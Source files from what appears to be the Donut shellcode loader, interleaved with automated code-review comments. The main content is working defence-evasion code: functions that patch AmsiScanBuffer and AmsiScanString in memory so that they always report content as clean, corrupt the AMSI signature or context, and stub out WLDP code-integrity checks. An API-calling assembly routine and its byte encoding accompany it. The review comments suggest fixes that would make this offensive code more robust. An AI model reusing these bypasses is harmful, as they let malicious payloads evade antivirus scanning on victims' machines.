53 HAMSICONTEXT amsiContext,
54 PVOID buffer,
55 ULONG length,
56 LPCWSTR contentName,
57 HAMSISESSION amsiSession,
58 AMSI_RESULT *result)
59 {
60 *result = AMSI_RESULT_CLEAN;
61 return S_OK;
62 }
63
64 // This function is never called. It's simply used to calculate
65 // the length of AmsiScanBufferStub above.
66 //
67 // The reason it performs a multiplication is because MSVC can identify
68 // functions that perform the same operation and eliminate duplicates
69 // from the compiled code. Null subroutines are eliminated.
70
71 int AmsiScanBufferStubEnd(int a, int b) {
72 return a * b;
73 }
74
75 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
76 HRESULT WINAPI AmsiScanStringStub(
77 HAMSICONTEXT amsiContext,
78 LPCWSTR string,
79 LPCWSTR contentName,
80 HAMSISESSION amsiSession,
81 AMSI_RESULT *result)
82 {
83 *result = AMSI_RESULT_CLEAN;
84 return S_OK;
85 }
86
87 int AmsiScanStringStubEnd(int a, int b) {
88 return a + b;
89 }
90
91 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
92 HMODULE dll;
93 DWORD len, op, t;
94 LPVOID cs;
95
96 // try load amsi. if unable, assume DLL doesn't exist
97 // and return TRUE to indicate it's okay to continue
98 dll = inst->api.LoadLibraryA(inst->amsi.s);
99 if(dll == NULL) return TRUE;
100
101 // resolve address of AmsiScanBuffer. if not found,
102 // return FALSE because it should exist ...
103 cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
104 if(cs == NULL) return FALSE;
105
106 // calculate length of stub
107 len = (ULONG_PTR)AmsiScanBufferStubEnd -
108 (ULONG_PTR)AmsiScanBufferStub;
109
110 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
111
112 // check for negative length. this would only happen when
113 // compiler decides to re-order functions.
114 if((int)len < 0) return FALSE;
115
116 // make the memory writeable. return FALSE on error
117 if(!inst->api.VirtualProtect(
118 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
119
120 DPRINT("Overwriting AmsiScanBuffer");
121 // over write with virtual address of stub
122 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
123 // set memory back to original protection
124 inst->api.VirtualProtect(cs, len, op, &t);
125
126 // resolve address of AmsiScanString. if not found,
127 // return FALSE because it should exist ...
128 cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
129 if(cs == NULL) return FALSE;
130
131 // calculate length of stub
132 len = (ULONG_PTR)AmsiScanStringStubEnd -
133 (ULONG_PTR)AmsiScanStringStub;
134
135 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
136
137 // check for negative length. this would only happen when
138 // compiler decides to re-order functions.
139 if((int)len < 0) return FALSE;
140
141 // make the memory writeable
142 if(!inst->api.VirtualProtect(
143 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
144
145 DPRINT("Overwriting AmsiScanString");
146 // over write with virtual address of stub
147 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
148 // set memory back to original protection
149 inst->api.VirtualProtect(cs, len, op, &t);
150
151 return TRUE;
152 }
153
154 #elif defined(BYPASS_AMSI_B)
155
156 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
157 HMODULE dll;
158 PBYTE cs;
159 DWORD i, op, t;
160 BOOL disabled = FALSE;
161 PDWORD Signature;
162
163 // try load amsi. if unable to load, assume
164 // it doesn't exist and return TRUE to indicate
165 // it's okay to continue.
166 dll = inst->api.LoadLibraryA(inst->amsi.s);
167 if(dll == NULL) return TRUE;
168
169 // resolve address of AmsiScanBuffer. if unable, return
170 // FALSE because it should exist.
171 cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
172 if(cs == NULL) return FALSE;
173
174 // scan for signature
175 for(i=0;;i++) {
176 Signature = (PDWORD)&cs[i];
177 // is it "AMSI"?
178 if(*Signature == inst->amsi.w[0]) {
179 // set memory protection for write access
180 inst->api.VirtualProtect(cs, sizeof(DWORD),
181 PAGE_EXECUTE_READWRITE, &op);
182
183 // change signature
184 *Signature++;
185
186 // set memory back to original protection
187 inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
188 disabled = TRUE;
189 break;
190 }
191 }
192 return disabled;
193 }
194
195 #elif defined(BYPASS_AMSI_C)
196
197 // Attempt to find AMSI context in .data section of CLR.dll
198 // Could also scan PEB.ProcessHeap for this..
199 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
200 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
201
202 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
203 LPVOID clr;
204 BOOL disabled = FALSE;
205 PIMAGE_DOS_HEADER dos;
206 PIMAGE_NT_HEADERS nt;
207 PIMAGE_SECTION_HEADER sh;
208 DWORD i, j, res;
209 PBYTE ds;
210 MEMORY_BASIC_INFORMATION mbi;
211 _PHAMSICONTEXT ctx;
212
213 // get address of CLR.dll. if unable, this
214 // probably isn't a dotnet assembly being loaded
215 clr = inst->api.GetModuleHandleA(inst->clr);
216 if(clr == NULL) return FALSE;
217
218 dos = (PIMAGE_DOS_HEADER)clr;
219 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
220 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
221 nt->FileHeader.SizeOfOptionalHeader);
222
223 // scan all writeable segments while disabled == FALSE
224 for(i = 0;
225 i < nt->FileHeader.NumberOfSections && !disabled;
226 i++)
227 {
228 // if this section is writeable, assume it's data
229 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
230 // scan section for pointers to the heap
231 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
232
233 for(j = 0;
234 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
235 j += sizeof(ULONG_PTR))
236 {
237 // get pointer
238 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
239 // query if the pointer
240 res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
241 if(res != sizeof(mbi)) continue;
242
243 // if it's a pointer to heap or stack
244 if ((mbi.State == MEM_COMMIT ) &&
245 (mbi.Type == MEM_PRIVATE ) &&
246 (mbi.Protect == PAGE_READWRITE))
247 {
248 ctx = (_PHAMSICONTEXT)ptr;
249 // check if it contains the signature
250 if(ctx->Signature == inst->amsi.w[0]) {
251 // corrupt it
252 ctx->Signature++;
253 disabled = TRUE;
254 break;
255 }
256 }
257 }
258 }
259 }
260 return disabled;
261 }
262
263 #elif defined(BYPASS_AMSI_D)
264 // This is where you may define your own AMSI bypass.
265 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
266
267 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
268
269 }
270
271 #endif
272
273 #if defined(BYPASS_WLDP_A)
274
275 // fake function that always returns S_OK and isApproved = TRUE
276 HRESULT WINAPI WldpIsClassInApprovedListStub(
277 REFCLSID classID,
278 PWLDP_HOST_INFORMATION hostInformation,
279 PBOOL isApproved,
280 DWORD optionalFlags)
281 {
282 *isApproved = TRUE;
283 return S_OK;
284 }
285
286 // make sure prototype is different from other null subroutines
287 // to avoid duplication by MSVC
288 int WldpIsClassInApprovedListStubEnd(int a, int b) {
289 return a - b;
290 }
291
292 // fake function that always returns S_OK
293 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
294 HANDLE fileHandle,
295 PVOID baseImage,
296 ULONG ImageSize)
297 {
298 return S_OK;
299 }
300
301 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
302 return a / b;
303 }
304
305 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
306 HMODULE wldp;
307 DWORD len, op, t;
308 LPVOID cs;
309
310 // try load wldp. if unable, assume DLL doesn't exist
311 // and return TRUE to indicate it's okay to continue
312 wldp = inst->api.LoadLibraryA(inst->wldp);
313 if(wldp == NULL) return TRUE;
314
315 // resolve address of WldpQueryDynamicCodeTrust
316 // if not found, return FALSE because it should exist
317 cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
318 if(cs == NULL) return FALSE;
319
320 // calculate length of stub
321 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
322 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
323
324 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
325
326 // check for negative length. this would only happen when
327 // compiler decides to re-order functions.
328 if((int)len < 0) return FALSE;
329
330 // make the memory writeable. return FALSE on error
331 if(!inst->api.VirtualProtect(
332 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
333
334 // overwrite with virtual address of stub
335 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
336 // set back to original protection
337 inst->api.VirtualProtect(cs, len, op, &t);
338
339 // resolve address of WldpIsClassInApprovedList
340 // if not found, return FALSE because it should exist
341 cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
342 if(cs == NULL) return FALSE;
343
344 // calculate length of stub
345 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
346 (ULONG_PTR)WldpIsClassInApprovedListStub;
347
348 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
349
350 // check for negative length. this would only happen when
351 // compiler decides to re-order functions.
352 if((int)len < 0) return FALSE;
353
354 // make the memory writeable. return FALSE on error
355 if(!inst->api.VirtualProtect(
356 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
357
358 // overwrite with virtual address of stub
359 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
360 // set back to original protection
361 inst->api.VirtualProtect(cs, len, op, &t);
362
363 return TRUE;
364 }
365 #elif defined(BYPASS_WLDP_B)
366 // This is where you may define your own WLDP bypass.
367 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
368
369 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
370
371 }
372 #endif
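Review bot: The `BYPASS_AMSI_D` placeholder `DisableAMSI` (gutter 267–269) and the `BYPASS_WLDP_B` placeholder `DisableWLDP` (gutter 369–371) are `BOOL` functions with empty bodies, so a build that selects either option compiles a function whose return value is indeterminate and whatever the loader does with that result is undefined behaviour rather than a deliberate choice. Since these branches exist only to be filled in by whoever rebuilds the project, the unfilled state should be a compile-time error rather than a silent one: replace each empty body with `#error "BYPASS_AMSI_D selected but DisableAMSI is not implemented"` (and the equivalent for `BYPASS_WLDP_B`). The comment above the `BYPASS_AMSI_D` branch (gutter 265) also tells the reader to build with `BYPASS_AMSI_C defined` where it means `BYPASS_AMSI_D`, which contradicts the `#elif` directly above it.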
0 ;
1 ; Copyright © 2019 TheWover, Odzhan. All Rights Reserved.
2 ;
3 ; Redistribution and use in source and binary forms, with or without
4 ; modification, are permitted provided that the following conditions are
5 ; met:
6 ;
7 ; 1. Redistributions of source code must retain the above copyright
8 ; notice, this list of conditions and the following disclaimer.
9 ;
10 ; 2. Redistributions in binary form must reproduce the above copyright
11 ; notice, this list of conditions and the following disclaimer in the
12 ; documentation and/or other materials provided with the distribution.
13 ;
14 ; 3. The name of the author may not be used to endorse or promote products
15 ; derived from this software without specific prior written permission.
16 ;
17 ; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
18 ; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
19 ; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
20 ; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
21 ; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
22 ; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 ; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
24 ; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
25 ; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
26 ; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
27 ; POSSIBILITY OF SUCH DAMAGE.
28 ;
29 ;
30 ; void call_api(FARPROC api, int param_cnt, WCHAR param[]);
31
32 %define DONUT_MAX_PARAM 8
33 %define DONUT_MAX_NAME 256
34
35 struc HOME_SPACE
36 ._rcx resq 1
37 ._rdx resq 1
38 ._r8 resq 1
39 ._r9 resq 1
40 endstruc
41
42 struc _ds
43 .hs: resq HOME_SPACE_size
44
45 .arg4 resq 1
46 .arg5 resq 1
47 .arg6 resq 1
48 .arg7 resq 1
49
50 ._rdi resq 1
51 ._rsi resq 1
52 ._rbp resq 1
53 ._rbx resq 1
54 ._rsp resq 1
55 endstruc
56
57 %ifndef BIN
58 global call_api
59 global _call_api
60 %endif
61
62 call_api:
63 _call_api:
64 bits 32
65
66 ; int3
67
68 xor eax, eax ;
69 dec eax ;
70 jns L2 ; if SF=0, goto x64
71
72 mov eax, [esp+ 4] ; eax = api address
73 mov ecx, [esp+ 8] ; ecx = param_cnt
74 mov edx, [esp+12] ; edx = params
75 L1:
76 push edx ; save params[i] on stack
77 add edx, DONUT_MAX_NAME * 2 ; advance to next element
78 sub ecx, 1 ; subtract one from param_cnt
79 jnz L1
80 call eax ; call api
81 ret
82
83 L2:
84 bits 64
85
86 sub rsp, ((_ds_size & -16) + 16) - 8
87
88 mov [rsp+_ds._rbp], rbp
89 mov [rsp+_ds._rbx], rbx
90 mov [rsp+_ds._rdi], rdi
91 mov [rsp+_ds._rsi], rsi
92
93 mov rsi, rsp ; rsi = rsp after allocation
94 mov rdi, rcx ; rdi = api to call
95 mov eax, DONUT_MAX_NAME * 2
96
97 mov rcx, r8 ; rcx = param[0]
98 lea rdx, [rcx+rax] ; rdx = param[1]
99 lea r8, [rdx+rax] ; r8 = param[2]
100 lea r9, [r8+rax] ; r9 = param[3]
101
102 lea rbx, [r9+rax]
103 mov [rsp+_ds.arg4], rbx ; param[4]
104 add rbx, rax
105 mov [rsp+_ds.arg5], rbx ; param[5]
106 add rbx, rax
107 mov [rsp+_ds.arg6], rbx ; param[6]
108 add rbx, rax
109 mov [rsp+_ds.arg7], rbx ; param[7]
110 call rdi
111
112 mov rsp, rsi ; restore rsp after allocation
113 mov rsi, [rsp+_ds._rsi]
114 mov rdi, [rsp+_ds._rdi]
115 mov rbx, [rsp+_ds._rbx]
116 mov rbp, [rsp+_ds._rbp]
117
118 add rsp, ((_ds_size & -16) + 16) - 8
119 ret
120
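Review bot: The prototype comment at gutter 30 (`void call_api(FARPROC api, int param_cnt, WCHAR param[]);`) does not state the preconditions the two code paths depend on. The 32-bit path (gutter 75–81) executes `push edx` before it ever tests `ecx`, so a `param_cnt` of 0 wraps the counter at `sub ecx, 1` and keeps pushing until the stack is exhausted, and it returns with a bare `ret` straight after `call eax`, which is only balanced when the callee is stdcall and pops its own arguments. The 64-bit path (gutter 86–119) ignores `param_cnt` entirely and always materialises pointers to all DONUT_MAX_PARAM entries in rcx/rdx/r8/r9 and the `_ds.arg4`–`_ds.arg7` slots. The x86 loop also pushes `param[0]` first, so the callee receives the parameters in the opposite order to the x64 path unless the caller reverses them beforehand; I cannot confirm from this page whether it does. I would extend the header comment with `; Preconditions: param_cnt >= 1; on x86 the callee must be stdcall (it cleans the stack); on x64 param_cnt is ignored and pointers to all DONUT_MAX_PARAM entries are passed.`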
0
1 unsigned int CALL_API_BIN[47];
2
3 CALL_API_BIN[0] = 0x7948C031;
4 CALL_API_BIN[1] = 0x24448B1B;
5 CALL_API_BIN[2] = 0x244C8B04;
6 CALL_API_BIN[3] = 0x24548B08;
7 CALL_API_BIN[4] = 0xC281520C;
8 CALL_API_BIN[5] = 0x00000200;
9 CALL_API_BIN[6] = 0x7501E983;
10 CALL_API_BIN[7] = 0xC3D0FFF4;
11 CALL_API_BIN[8] = 0x48EC8148;
12 CALL_API_BIN[9] = 0x48000001;
13 CALL_API_BIN[10] = 0x3024AC89;
14 CALL_API_BIN[11] = 0x48000001;
15 CALL_API_BIN[12] = 0x38249C89;
16 CALL_API_BIN[13] = 0x48000001;
17 CALL_API_BIN[14] = 0x2024BC89;
18 CALL_API_BIN[15] = 0x48000001;
19 CALL_API_BIN[16] = 0x2824B489;
20 CALL_API_BIN[17] = 0x48000001;
21 CALL_API_BIN[18] = 0x8948E689;
22 CALL_API_BIN[19] = 0x0200B8CF;
23 CALL_API_BIN[20] = 0x894C0000;
24 CALL_API_BIN[21] = 0x148D48C1;
25 CALL_API_BIN[22] = 0x048D4C01;
26 CALL_API_BIN[23] = 0x0C8D4D02;
27 CALL_API_BIN[24] = 0x1C8D4900;
28 CALL_API_BIN[25] = 0x9C894801;
29 CALL_API_BIN[26] = 0x00010024;
30 CALL_API_BIN[27] = 0xC3014800;
31 CALL_API_BIN[28] = 0x249C8948;
32 CALL_API_BIN[29] = 0x00000108;
33 CALL_API_BIN[30] = 0x48C30148;
34 CALL_API_BIN[31] = 0x10249C89;
35 CALL_API_BIN[32] = 0x48000001;
36 CALL_API_BIN[33] = 0x8948C301;
37 CALL_API_BIN[34] = 0x0118249C;
38 CALL_API_BIN[35] = 0xD7FF0000;
39 CALL_API_BIN[36] = 0x48F48948;
40 CALL_API_BIN[37] = 0x2824B48B;
41 CALL_API_BIN[38] = 0x48000001;
42 CALL_API_BIN[39] = 0x2024BC8B;
43 CALL_API_BIN[40] = 0x48000001;
44 CALL_API_BIN[41] = 0x38249C8B;
45 CALL_API_BIN[42] = 0x48000001;
46 CALL_API_BIN[43] = 0x3024AC8B;
47 CALL_API_BIN[44] = 0x48000001;
48 CALL_API_BIN[45] = 0x0148C481;
49 CALL_API_BIN[46] = 0x00C30000;
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, size_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, size_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, size_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
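Review bot: `Memcpy` (gutter 53–62) casts away `const` from its `source` parameter with `unsigned char *in = (unsigned char*)source;`, which defeats the qualifier in the signature and is what `-Wcast-qual` exists to catch; it should read `const unsigned char *in = (const unsigned char*)source;`. In `Memset` (gutter 38–51) the portable branch stores `*p = value;` and relies on the implicit narrowing of `int` to a byte, so an explicit `*p = (unsigned char)value;` would make the intent visible and keep `-Wconversion` quiet. The file-level comment at gutter 34 says these replace the intrinsic C library functions but not why, and the MSVC remark at gutter 36–37 only hints at it; a one-line note such as `// presumably the loader cannot link the CRT, so these must not be optimised back into memset/memcpy/memcmp calls — confirm against the build flags` would tell the next maintainer what constraint they must preserve.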
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
